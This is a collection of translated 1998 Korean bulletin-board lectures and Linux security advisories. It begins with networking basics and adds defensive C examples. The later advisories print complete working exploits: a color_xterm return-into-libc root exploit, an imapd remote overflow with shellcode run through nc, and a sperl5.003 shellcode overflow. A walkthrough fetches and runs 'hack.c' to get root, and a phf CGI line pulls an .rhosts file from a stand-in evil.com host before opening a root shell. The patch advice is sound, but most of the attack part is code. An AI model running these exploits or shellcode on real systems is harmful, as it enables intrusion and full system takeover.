
Title: [Lecture] What are a gateway, a router and a bridge?

A gateway (Gateway) is, in general, whatever sits at the exit of one network, or one fenced-off area, and acts as the intermediate checkpoint for traffic leaving for the outside.
In everyday usage you can treat a router (Router) and a gateway as the same thing without any problem.
Gateway can, however, be used with other meanings.
For example, in the WWW something like CGI (Common Gateway Interface) uses "gateway" in a sense quite different from a router:
the http daemon takes arguments, runs some program, and uses its output to hand data back to the client in HTML form.
Anyway, in the "usual" case Router and Gateway are used with the same meaning.

So what is a bridge (Bridge)?
Like a router, it is a piece of network equipment whose job is to filter and forward packets.
How does it differ from a router?
A bridge filters packets by Ethernet address (the unique number burned into the LAN card's ROM).
A router filters and forwards packets by IP address.
What does that mean in practice?
Assume a LAN A and a LAN B are joined by a bridge.
On Ethernet, a host inside LAN A sends a packet to another host on the same LAN.
Will that packet be passed on to LAN B?

No. On a shared Ethernet segment every station sees every frame (it is a broadcast medium), so every host on LAN A, the bridge included, receives the same packet; but since a LAN-A host is sending to a LAN-A host, the bridge does not repeat it onto the LAN B side.
If a host in LAN A sends a packet to a host in LAN B, the sending host first puts it on LAN A.
The packet's destination is not on LAN A,
but the bridge, which also saw the packet, repeats it onto the B side.
So the packet gets delivered.
For that to work a bridge needs two or more network interfaces
(one interface on each of the two LANs)
and it has to know which Ethernet addresses live on which LAN.
Nothing has to be configured: the bridge watches the source address of every frame it sees and builds its table from that automatically.
The purpose of a bridge is to separate segments.
The weakness of Ethernet is that, because every frame is seen by everyone on the segment, performance drops when too many hosts hang off one LAN.
So when you split one LAN into two or more, that is, when you put in a bridge so that packets between hosts on the same LAN never leave it, you overcome that weakness.
A router works on the same principle as a bridge;
only what it uses to filter/forward packets differs.
A typical router also includes bridge functionality,
which is why it is sometimes called a brouter.
It would be nicer to explain this in more detail with a drawing....
Hehe, if I said any more my lack of skill would show, wouldn't it? :-P

One last remark:

Ethernet uses the CSMA/CD (Carrier Sense Multiple Access with Collision Detection) access method
defined by the IEEE 802 committee in the 802.3 standard (802.2 is the LLC sublayer that sits above it).
If you are curious, any data-communications textbook will have a friendly, detailed explanation.
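The learning and forwarding behaviour described above, as an added example (not code from the original post): a two-port bridge that records the port each source address was seen on and then decides, per frame, whether to filter it (both stations on the ingress segment), forward it to the other port, or flood it. It goes slightly beyond the text in one respect: a destination the bridge has never seen is flooded to the other segment once, which is how real bridges behave before the table is populated. The MAC addresses are made up.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define MAX_ENTRIES 64

typedef struct { uint8_t addr[6]; } mac_t;
typedef struct { mac_t mac; int port; } fdb_entry_t;
typedef struct { fdb_entry_t fdb[MAX_ENTRIES]; int n; } bridge_t;

/* Decisions other than "send out port N" (ports are 0 and 1 here). */
enum { FILTER = -1, FLOOD = -2 };

static const mac_t BROADCAST = {{0xff, 0xff, 0xff, 0xff, 0xff, 0xff}};

static int mac_eq(const mac_t *a, const mac_t *b) {
    return memcmp(a->addr, b->addr, sizeof a->addr) == 0;
}

/* Which port was this address last seen on? -1 if never seen. */
static int fdb_lookup(const bridge_t *br, const mac_t *mac) {
    for (int i = 0; i < br->n; i++)
        if (mac_eq(&br->fdb[i].mac, mac)) return br->fdb[i].port;
    return -1;
}

/* Record (or update) the port the source address arrived on. This is the
 * "automatic" table building the text mentions: nothing is configured. */
static void fdb_learn(bridge_t *br, const mac_t *mac, int port) {
    for (int i = 0; i < br->n; i++)
        if (mac_eq(&br->fdb[i].mac, mac)) { br->fdb[i].port = port; return; }
    if (br->n < MAX_ENTRIES) {
        br->fdb[br->n].mac = *mac;
        br->fdb[br->n].port = port;
        br->n++;
    }
}

/* Handle one frame seen on in_port. Returns the egress port, FILTER when both
 * stations are on the ingress segment, or FLOOD when the destination is a
 * broadcast or has not been learned yet. */
int bridge_handle(bridge_t *br, const mac_t *src, const mac_t *dst, int in_port) {
    fdb_learn(br, src, in_port);
    if (mac_eq(dst, &BROADCAST)) return FLOOD;
    int out = fdb_lookup(br, dst);
    if (out < 0) return FLOOD;
    if (out == in_port) return FILTER;
    return out;
}

/* Replays the text's scenario: A1 and A2 on LAN A (port 0), B1 on LAN B (port 1).
 * Returns 1 when every decision matches the expected behaviour. */
int bridge_selftest(void) {
    bridge_t br = { .n = 0 };
    mac_t a1 = {{0x00, 0x11, 0x22, 0x00, 0x00, 0x01}};   /* made-up addresses */
    mac_t a2 = {{0x00, 0x11, 0x22, 0x00, 0x00, 0x02}};
    mac_t b1 = {{0x00, 0x11, 0x22, 0x00, 0x00, 0x03}};
    int ok = 1;
    ok &= bridge_handle(&br, &a1, &a2, 0) == FLOOD;      /* A2 unknown: goes to B once */
    ok &= bridge_handle(&br, &a2, &a1, 0) == FILTER;     /* both learned on A: stays local */
    ok &= bridge_handle(&br, &a1, &a2, 0) == FILTER;
    ok &= bridge_handle(&br, &b1, &a1, 1) == 0;          /* B1 -> A1: forwarded to LAN A */
    ok &= bridge_handle(&br, &a1, &b1, 0) == 1;          /* reply: forwarded to LAN B */
    ok &= bridge_handle(&br, &a1, &BROADCAST, 0) == FLOOD;
    return ok;
}

int main(void) {
    printf("learning bridge self-test: %s\n", bridge_selftest() ? "ok" : "FAILED");
    return !bridge_selftest();
}
```

Note what the table does for security: it is built purely from what the bridge observes, so a station that sends frames with a forged source address moves that address to its own port, and a flooded frame is visible on the other segment. That is the reason a bridge narrows broadcast load but is not an access-control device.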
Title: [Lecture] How hacking is done
This lecture could turn out to be a very dangerous one.
Use it well and you become a "skilled" person (?) who could even hack the Nownuri account service.. a skilled person who is hollow inside and all show.
Never just imitate this and stop there.
Study more and then do it properly..
Here goes.
For reference, every hack that caused a stir in the news in the past was this kind of hack.
Beginner level.
Well then..
Most people who hack do it this way.
It is very common..
You simply compile the exploit source on the target host (the one being hacked) and run it, and that is it..
Very easy, you say?
Shall we walk through the process?
[ Start ]
[root@loveyou lib]# telnet bbs.xxx.xx.xx
Trying 20.23.10.3...
Connected to xxxxxx.xx.kr.
Escape character is '^]'.
Welecom My host~
## 01:17 on Monday, 30 March 1998 (ttyp5)
login: loveyou
Password:
Last login: Mon Mar 30 00:50:04 from loveyou
[loveyou@bbs loveyou]$ ls -al /usr/bin/sperl*
-rwsr-xr-x 2 root root 402280 Apr 22 1997 /usr/bin/sperl5.003
/* Look for a target. Most of the time you look for a program with setuid set.
   See the "rws"? That is the setuid bit.
   Then fetch the exploit program for it and compile it.
   Usually the source is fetched with ftp. */
[loveyou@bbs loveyou]$ ftp loveyou.ml.org
Connected to loveyou.ml.org.
220 xxxxxxxx.xx.xx.xr FTP server (Version wu-2.4.2-academ[BETA-xx](1) Sat xxx xx xx:xx:xx KST 199x) ready.
Name (xxxxx:loveyou): loveyou
331 Password required for loveyou
Password:
230 User shade logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get hack.c
local: hack.c remote: hack.c
200 PORT command successful.
150 Opening BINARY mode data connection for hack.c (4037 bytes).
226 Transfer complete.
4037 bytes received in 1.57 secs (2.5 Kbytes/sec)
ftp> quit
[loveyou@bbs loveyou]$ cc -o hack hack.c
/* Compile the source: this produces a program called hack */
[loveyou@bbs loveyou]$ ./hack
Using address: 0x45c
# <- a root prompt, right? When you get this, it succeeded.
Hacking is too easy. Isn't it?
But hacks this easy can be prevented in advance by administrators..
An administrator can do two things.
First, block it for now: chmod 700 /usr/bin/sperl*
(the numeric mode 700 both clears the setuid bit and locks everyone but root out of the binary).
Second, then go by ftp to the relevant Linux site or the software's own site, fetch the patch and apply it. If you don't know how,
just doing the first is fine, or ask loveyou for advice.
^_^
That's it.
Fun, isn't it?

This is what hacking is.
The high-school student who caused a stir by hacking the Nownuri account server in the past did this kind of hack.
Too simple, right?
You can't judge hacking by this;
it is only a tiny part of it.
But there are a lot of people who brag about pulling this off, which is a bit sad.
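The attacker's first step above, "ls -al" to find a setuid-root binary, is also the administrator's first check. This added example (not from the post) does that check over a whole directory tree with nftw(): it reports every regular file that carries the setuid or setgid bit and is owned by the given uid, and returns the count, so it can be diffed against a known-good list. The self-check builds a throwaway tree under /tmp with one 4755 file; those files are constructed by the example and are not real system binaries.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <ftw.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

static int g_found;     /* privileged files seen by the current walk */
static int g_owner;     /* owner uid that makes a setuid file interesting (0 = root) */

/* nftw() callback: report regular files carrying setuid or setgid owned by g_owner. */
static int visit(const char *path, const struct stat *sb, int typeflag, struct FTW *ftwbuf) {
    (void)ftwbuf;
    if (typeflag != FTW_F) return 0;
    int suid = (sb->st_mode & S_ISUID) != 0;
    int sgid = (sb->st_mode & S_ISGID) != 0;
    if (!(suid || sgid) || (int)sb->st_uid != g_owner) return 0;
    printf("%s%s%04o %s\n", suid ? "setuid " : "", sgid ? "setgid " : "",
           (unsigned)(sb->st_mode & 07777), path);
    g_found++;
    return 0;
}

/* Walk `root` and count setuid/setgid files owned by `owner`; -1 on error.
 * FTW_PHYS keeps symlinks from being followed, so a link pointing back into
 * /usr/bin cannot inflate the count or loop the walk. */
int count_privileged(const char *root, int owner) {
    g_found = 0;
    g_owner = owner;
    if (nftw(root, visit, 16, FTW_PHYS) != 0) return -1;
    return g_found;
}

/* Self-check on a scratch tree built here (not real system files): one file
 * with mode 4755 like sperl5.003, one plain file. The owner is the current
 * user, so the walk is asked for that uid instead of 0. Returns the count. */
int selftest(void) {
    char dir[] = "/tmp/suidauditXXXXXX";
    if (!mkdtemp(dir)) return -1;
    char suid[300], plain[300];
    snprintf(suid, sizeof suid, "%s/sperl5.003", dir);
    snprintf(plain, sizeof plain, "%s/readme", dir);
    int n = -1, fd;
    if ((fd = open(suid, O_WRONLY | O_CREAT, 0755)) >= 0) close(fd);
    if ((fd = open(plain, O_WRONLY | O_CREAT, 0644)) >= 0) close(fd);
    if (chmod(suid, 04755) == 0)                 /* rwsr-xr-x, as in the transcript */
        n = count_privileged(dir, (int)getuid());
    unlink(suid); unlink(plain); rmdir(dir);
    return n;                                    /* expect 1 */
}

int main(int argc, char **argv) {
    const char *root = argc > 1 ? argv[1] : "/usr/bin";
    int n = count_privileged(root, 0);
    printf("%d setuid/setgid root files under %s\n", n, root);
    return n < 0;
}
```

Run it as `./suidaudit /usr` (or any tree) and keep the output under version control; a new entry is exactly what the attacker in the transcript went looking for.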

Title: [Lecture] Blocking access from a specific outside host


Hmm.. when you feel that a suspicious person keeps coming in from some host,
and you want to keep just that host's users out?
There is a way.
Use the TCP wrapper that comes installed by default on Unix and Linux.
Ah, sounds grand?
It only takes two lines. Haha
The file is /etc/hosts.deny.. In that file write
daemon_list : client_list
that is, the wrapped service's name as it appears in inetd.conf (in.telnetd, in.ftpd, ... or ALL), a colon, and the host.
For example,
ALL:soback.kornet.nm.kr
means that connections to every wrapped service coming from soback.kornet.nm.kr
are refused.
Heh.. useful, right?
The file /etc/hosts.allow is where you permit connections from specific hosts.
So, hmm, it carries more weight than /etc/hosts.deny above: hosts.allow is consulted first, then hosts.deny, and a client that matches neither is let in, which is why a deny line for one host does nothing about the next host the same person logs in from.
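The allow-then-deny-then-permit decision just described, implemented as an added example (it is not tcp_wrappers' own code, only a model of its rule matching). It understands the patterns that matter for the point above: ALL, LOCAL (names without a dot), a leading-dot domain suffix, and exact names. The two constructed tables compare the post's single deny line with a deny-by-default layout; the host names are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

typedef struct { const char *daemons; const char *clients; } rule_t;

/* One pattern against one name. ALL matches anything, LOCAL matches names
 * without a dot, a leading-dot pattern matches a domain suffix, otherwise
 * the pattern must equal the name. */
static int pattern_matches(const char *pat, const char *name) {
    size_t pl = strlen(pat), nl = strlen(name);
    if (strcmp(pat, "ALL") == 0) return 1;
    if (strcmp(pat, "LOCAL") == 0) return strchr(name, '.') == NULL;
    if (pat[0] == '.') return nl > pl && strcmp(name + (nl - pl), pat) == 0;
    return strcmp(pat, name) == 0;
}

/* A list is comma- or space-separated patterns; true if any of them matches. */
static int list_matches(const char *list, const char *name) {
    char buf[256], *save = NULL;
    strncpy(buf, list, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    for (char *tok = strtok_r(buf, ", ", &save); tok; tok = strtok_r(NULL, ", ", &save))
        if (pattern_matches(tok, name)) return 1;
    return 0;
}

static int table_matches(const rule_t *t, int n, const char *daemon, const char *client) {
    for (int i = 0; i < n; i++)
        if (list_matches(t[i].daemons, daemon) && list_matches(t[i].clients, client))
            return 1;
    return 0;
}

/* The access decision: hosts.allow first, then hosts.deny, else permit.
 * Returns 1 when the connection is accepted, 0 when it is refused. */
int wrapper_decide(const rule_t *allow, int na, const rule_t *deny, int nd,
                   const char *daemon, const char *client) {
    if (table_matches(allow, na, daemon, client)) return 1;
    if (table_matches(deny, nd, daemon, client)) return 0;
    return 1;
}

/* Constructed tables (hypothetical hosts): the post's single deny line, and a
 * deny-by-default layout where hosts.allow lists the exceptions. */
const rule_t deny_post[]  = { { "ALL", "soback.kornet.nm.kr" } };
const rule_t deny_all[]   = { { "ALL", "ALL" } };
const rule_t allow_some[] = { { "sshd, in.ftpd", "LOCAL, .example.ac.kr" } };

int main(void) {
    printf("post's layout, telnet from other.kornet.nm.kr -> %d (still let in)\n",
           wrapper_decide(NULL, 0, deny_post, 1, "in.telnetd", "other.kornet.nm.kr"));
    printf("deny-all layout, sshd from a.example.ac.kr -> %d\n",
           wrapper_decide(allow_some, 1, deny_all, 1, "sshd", "a.example.ac.kr"));
    printf("deny-all layout, telnet from a.example.ac.kr -> %d\n",
           wrapper_decide(allow_some, 1, deny_all, 1, "in.telnetd", "a.example.ac.kr"));
    return 0;
}
```

The first line of output is the catch the text hints at: with only a deny entry for one host, everyone else is still accepted, so the robust layout is `ALL: ALL` in hosts.deny and the permitted services and sources in hosts.allow.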
Title: [Security] Linux xterm, color_xterm
Command
xrm (color_xterm, xterm, nxterm)
System
Linux Slackware 3.1, RedHat 4.2
Problem
A buffer overflow can be triggered through the -xrm resource argument of these setuid terminal emulators. Solar Designer's exploit below works even with a non-executable stack because it never runs code on the stack: it overflows with pointers into libc and ends up having an X11 callback call system("/bin/sh").
>-- cx.c --<
/*
 * color_xterm buffer overflow exploit for Linux with
 * non-executable stack
 * Copyright (c) 1997 by Solar Designer
 *
 * Compile:
 * gcc cx.c -o cx -L/usr/X11/lib \
 *   `ldd /usr/X11/bin/color_xterm | sed -e s/^.lib/-l/ -e s/\\\.so.\\\+//`
 *
 * Run:
 * $ ./cx
 * system() found at: 401553b0
 * "/bin/sh" found at: 401bfa3d
 * bash# exit (^^;)
 * Segmentation fault
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/reg.h>   /* EIP: register index used with PTRACE_PEEKUSR on i386 */
#define SIZE1 1200 /* Amount of data to overflow with */
#define ALIGNMENT1 0 /* 0..3 */
#define OFFSET 22000 /* Structure array offset */
#define SIZE2 16000 /* Structure array size */
#define ALIGNMENT2 5 /* 0, 4, 1..3, 5..7 */
#define SIZE3 SIZE2
#define ALIGNMENT3 (ALIGNMENT2 & 3)
#define ADDR_MASK 0xFF000000
char buf1[SIZE1], buf2[SIZE2 + SIZE3], *buf3 = &buf2[SIZE2];
int *ptr;
int pid, pc, shell, step;
int started = 0;
jmp_buf env;
void handler() {
started++;
}
/* SIGSEGV handler, to search in libc */
void fault() {
if (step < 0) {
/* Change the search direction */
longjmp(env, 1);
} else {
/* The search failed in both directions */
puts("\"/bin/sh\" not found, bad luck");
exit(1);
}
}
void error(char *fn) {
perror(fn);
if (pid > 0) kill(pid, SIGKILL);
exit(1);
}
int nz(int value) {
if (!(value & 0xFF)) value |= 8;
if (!(value & 0xFF00)) value |= 0x100;
return value;
}
void main() {
/*
 * A portable way to get the stack pointer value; why do other exploits use
 * an assembly instruction here?!
 */
int sp = (int)&sp;
signal(SIGUSR1, handler);
/* Create a child process to trace */
if ((pid = fork()) < 0) error("fork");
if (!pid) {
/* Send the parent a signal, so it starts tracing */
kill(getppid(), SIGUSR1);
/* A loop since the parent may not start tracing immediately */
while (1) system("");
}
/* Wait until the child tells us the next library call will be system() */
while (!started);
if (ptrace(PTRACE_ATTACH, pid, 0, 0)) error("PTRACE_ATTACH");
/* Single step the child until it gets out of system() */
do {
waitpid(pid, NULL, WUNTRACED);
pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0);
if (pc == -1) error("PTRACE_PEEKUSR");
if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0))
error("PTRACE_SINGLESTEP");
} while ((pc & ADDR_MASK) != ((int)main & ADDR_MASK));
/* Single step the child until it calls system() again */
do {
waitpid(pid, NULL, WUNTRACED);
pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0);
if (pc == -1) error("PTRACE_PEEKUSR");
if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0))
error("PTRACE_SINGLESTEP");
} while ((pc & ADDR_MASK) == ((int)main & ADDR_MASK));
/* Kill the child, we don't need it any more */
if (ptrace(PTRACE_KILL, pid, 0, 0)) error("PTRACE_KILL");
pid = 0;
printf("system() found at: %08x\n", pc);

/* Let's hope there's an extra NOP if system() is 256 byte aligned */
if (!(pc & 0xFF))
if (*(unsigned char *)--pc != 0x90) pc = 0;
/* There's no easy workaround for these (except for using another function) */
if (!(pc & 0xFF00) || !(pc & 0xFF0000) || !(pc & 0xFF000000)) {
puts("Zero bytes in address, bad luck");
exit(1);
}
/*
 * Search for a "/bin/sh" in libc until we find a copy with no zero bytes
 * in its address. To avoid specifying the actual address that libc is
 * mmap()ed to we search from the address of system() in both directions
 * until a SIGSEGV is generated.
 */
if (setjmp(env)) step = 1; else step = -1;
shell = pc;
signal(SIGSEGV, fault);
do
while (memcmp((void *)shell, "/bin/sh", 8)) shell += step;
while (!(shell & 0xFF) || !(shell & 0xFF00) || !(shell & 0xFF0000));
signal(SIGSEGV, SIG_DFL);
printf("\"/bin/sh\" found at: %08x\n", shell);
/* buf1 (which we overflow with) is filled with pointers to buf2 */
memset(buf1, 'x', ALIGNMENT1);
ptr = (int *)(buf1 + ALIGNMENT1);
while ((char *)ptr < buf1 + SIZE1 - sizeof(int))
*ptr++ = nz(sp - OFFSET); /* db */
buf1[SIZE1 - 1] = 0;
/* buf2 is filled with pointers to "/bin/sh" and to buf3 */
memset(buf2, 'x', SIZE2 + SIZE3);
ptr = (int *)(buf2 + ALIGNMENT2);
while ((char *)ptr < buf2 + SIZE2) {
*ptr++ = shell; /* db->mbstate */
*ptr++ = nz(sp - OFFSET + SIZE2); /* db->methods */
}
/* buf3 is filled with pointers to system() */
ptr = (int *)(buf3 + ALIGNMENT3);
while ((char *)ptr < buf3 + SIZE3 - sizeof(int))
*ptr++ = pc; /* db->methods->mbfinish */
buf3[SIZE3 - 1] = 0;
/* Put buf2 and buf3 on the stack */
setenv("BUFFER", buf2, 1);
/* GetDatabase() in libX11 will do
(*db->methods->mbfinish)(db->mbstate) */
execl("/usr/X11/bin/color_xterm", "color_xterm", "-xrm", buf1,
NULL);
error("execl");
}
>-- cx.c --<
Solution
Find the patched version at the address below and apply it.
http://www.false.com/security/linux-stack/
Note that this exploit is built for a non-executable stack, so a stack-protection patch by itself is not what stops it; the fixed binaries (or removing the setuid bit from color_xterm) are.

Title: [Security] Linux Ghostscript


Command
Ghostscript
System
Linux systems running Ghostscript 1.4
Problem
A PostScript file can carry hidden code that the Ghostscript interpreter executes, and that code
can briefly reach a shell and do whatever it likes on the system. The code is simply embedded in the
PostScript document, so viewing or printing a file someone sent you is enough to run it; if Ghostscript
is running with root privileges, the commands run as root.
Solution
Install a Ghostscript newer than 1.4.
---------------------------
No.: 114/177  Posted by: Kim Yong-jun (loveyou)  98/02/16 23:52  (89 lines)
Title: [Security] Linux imapd
Command
imapd
System
RedHat up to version 4.0
Slackware 3.2
Problem
Through the imapd daemon a remote user can obtain root before logging in.
This is very dangerous... even the root password can be changed.
/*
* IMAPd Linux/intel remote xploit by savage@apostols.org
* 1997-April-05
* Workz fine against RedHat and imapd distributed with pine
* Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and the
* rest of ToXyn !!!
 * usage:
 * $ (imap 0; cat) | nc victim 143
 *         |
 *         +--> usually from -1000 to 1000 ( try in steps of 100 )
 *              [ I try 0, 100 and 200 - so1o ]
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shell[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
"\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
"\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xe8\xc0\xff\xff\xff/bin/sh";
char username[1024+255];
void main(int argc, char *argv[]) {
  int i,a;
  long val;

  if(argc>1)
    a=atoi(argv[1]);
  else
    a=0;

  strcpy(username,shell);
  /* After the NOP sled and shellcode, fill the rest of the login name with
   * copies of the guessed return address (little-endian), shifted by the
   * offset given on the command line. The page's copy lost this loop body;
   * the base address 0xbffff501 is taken from the published exploit. */
  for(i=strlen(username);i+3<sizeof(username);i+=4) {
    val = 0xbffff501 + a;
    username[i+0] = (val & 0x000000ff);
    username[i+1] = (val & 0x0000ff00) >> 8;
    username[i+2] = (val & 0x00ff0000) >> 16;
    username[i+3] = (val & 0xff000000) >> 24;
  }
  username[ sizeof(username)-1 ] = 0;

  printf("%d LOGIN \"%s\" pass\n", (int)sizeof(shell), username);
}
Solution
RedHat 4.0 users: upgrading to 4.1 fixes it.
RedHat 2.0 users: run rpm -e imap to remove the package.
A patched package is on ftp.redhat.com; fetch it and install it.

Title: [Security] Linux ircd


Command
ircd
System
Debian Linux (1.3.1)
Problem
The IRC server package ircd 2.9.32-3 is included in Debian 1.3.1.
The first problem is that /etc/ircd/ is world-readable: the permissions let anyone read
the server configuration files in that directory, and even the passwords of the IRC operators.
Second, installing the package puts this line into /etc/inetd.conf:
ircd stream tcp wait root /usr/sbin/ircd ircd -i
------
As you can see above, the part that says root should be changed to irc..
The principle is that root should not be involved in running the service at all.
Solution
Loveyou~# chmod 700 /etc/ircd/
Loveyou~# chown irc.irc /etc/ircd/
Loveyou~# grep ircd /etc/inetd.conf
ircd stream tcp wait irc /usr/sbin/ircd ircd -i
It must read irc as above (and inetd must be sent a HUP so it re-reads the file).
---------------------------
Title: [Security] Linux rcp (remote)
Command
/usr/bin/rcp
System
Red Hat 4.0 (if user nobody has UID 65535) and Slackware 3.1
(possibly others)
Problem
The /usr/bin/rcp problem appears when nobody's uid is 65535. With 16-bit uids, 65535 is the same value
as (uid_t)-1, which the setuid()/setreuid() calls treat as "leave this id unchanged", so when the
setuid-root rcp tries to drop to the invoking user it silently stays root and creates files as root.
If the other side's server runs NCSA httpd (whose CGIs run as nobody), the following can be done:
root[11:20][504]~# su - nobody
[nobody@slip-70-8 /]$ id
uid=65535(nobody) gid=65535
[nobody@slip-70-8 /]$ rcp oberheim@moe.cc.utexas.edu:brb /tmp/test
[nobody@slip-70-8 /]$ ls -la /tmp/test
-rw------- 1 root 65535 0 Jan 29 11:20 /tmp/test
$ echo "+ +" > /tmp/my.rhosts
$ echo "GET /cgi-bin/phf?Qalias=x%0arcp+hacker@evil.com:/tmp/my.rhosts+/root/.rhosts" | nc -v - 20 victim.com 80
$ rsh -l root victim.com "/bin/sh -i"
#

Solution
Give nobody a UID of 99.
---------------------------
Title: [Security] Linux perl 5.003
Command
sperl5.003
Affected hosts
Linux Slackware 3.1, 3.2
RedHat Linux
Problem
The setuid-root file sperl5.003 can be made to overflow a buffer through its argument.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define DEFAULT_OFFSET 640
#define DEFAULT_BUFFER_SIZE 1600
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;

if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
execl("/usr/bin/sperl5.003","/usr/sbin/sperl5.003",buff, NULL);
}
Solution
Remove the suid bit from sperl5.003.
Or move to version 5.003_97f.
---------------------------
Title: [Security] Linux sysctl()
Command
sysctl()
Affected systems
Linux prior to 2.0.31
Problem
There is a problem in the sysctl() function: syslog flooding is possible,
and a security problem that can cause an overflow has been found.
#include <sys/sysctl.h>
main() {
 sysctl(NULL, 0x80000000, NULL, NULL, NULL, 0);
 /* 0x80000000 can be replaced with 0xC0000000 -- both are negative, and
  * produce a zero when multiplied by sizeof(int) */
}
The same kind of problem exists in getgroups() as well.
Solution
This fix is only for kernels at or before 2.0.31.
In the file /usr/src/linux/kernel/sysctl.c, the check
 struct ctl_table_header *tmp;
 void *context;
 if (nlen == 0 || nlen >= CTL_MAXNAME)   <= this
 if (nlen <= 0 || nlen >= CTL_MAXNAME)   <= becomes this
 return -ENOTDIR;
 error = verify_area(VERIFY_READ,name,nlen*sizeof(int));
Then recompile the kernel.
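Why the one-character change matters, as an added example (not from the post): the kernel sizes its access check by multiplying the caller's nlen by sizeof(int), and in 32-bit arithmetic a negative nlen such as 0x80000000 turns that product into 0. A zero-byte verify_area() passes, and the code then walks nlen integers of user memory. The two check functions below are the before and after lines of the page's fix; the 1997 kernel's 32-bit multiplication is reproduced with uint32_t, and CTL_MAXNAME is assumed to be 10 as in the 2.0 headers.

```c
#include <stdint.h>
#include <stdio.h>

#define CTL_MAXNAME 10          /* assumed: value of the 2.0 kernel header */

/* Size the old code handed to verify_area(), computed as a 32-bit kernel did. */
uint32_t access_size_32(int nlen) {
    return (uint32_t)nlen * (uint32_t)sizeof(int);
}

/* Old check: rejects only 0 and too-large values; negative nlen slips through. */
int old_check_accepts(int nlen) {
    return !(nlen == 0 || nlen >= CTL_MAXNAME);
}

/* Patched check: negative lengths are rejected before any arithmetic on them. */
int new_check_accepts(int nlen) {
    return !(nlen <= 0 || nlen >= CTL_MAXNAME);
}

/* 1 if a request with this nlen passes the given check *and* gets a zero-byte
 * access window, i.e. exactly the combination the exploit relies on. */
int bypasses(int (*check)(int), int nlen) {
    return check(nlen) && access_size_32(nlen) == 0;
}

int main(void) {
    int probes[] = { 3, 0, 10, (int)0x80000000u, (int)0xC0000000u, -1 };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        int n = probes[i];
        printf("nlen=%11d  size32=%10u  old:%s  new:%s\n", n, access_size_32(n),
               bypasses(old_check_accepts, n) ? "BYPASS" : "ok    ",
               bypasses(new_check_accepts, n) ? "BYPASS" : "ok    ");
    }
    return 0;
}
```

The table also shows why -1 was never a useful probe: its product is 0xFFFFFFFC, so verify_area() fails on a 4 GB range. Only values whose low two bits are clear and whose product wraps to exactly zero, 0x80000000 and 0xC0000000, get through the old check.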
---------------------------
Title: [Security] Linux & Unix sendmail (1)
Command
sendmail (8.7 ~ 8.8.2)
Affected systems
Every Unix shipping one of these sendmail versions
Problem
Root can be obtained with the simple script below. The trick: sendmail started with argv[0] set to /tmp/smtpd
re-executes argv[0] when it receives SIGHUP, still as root, so the attacker's /tmp/smtpd runs as root.

#!/bin/sh
#
#
# Hi !
# This is exploit for sendmail smtpd bug
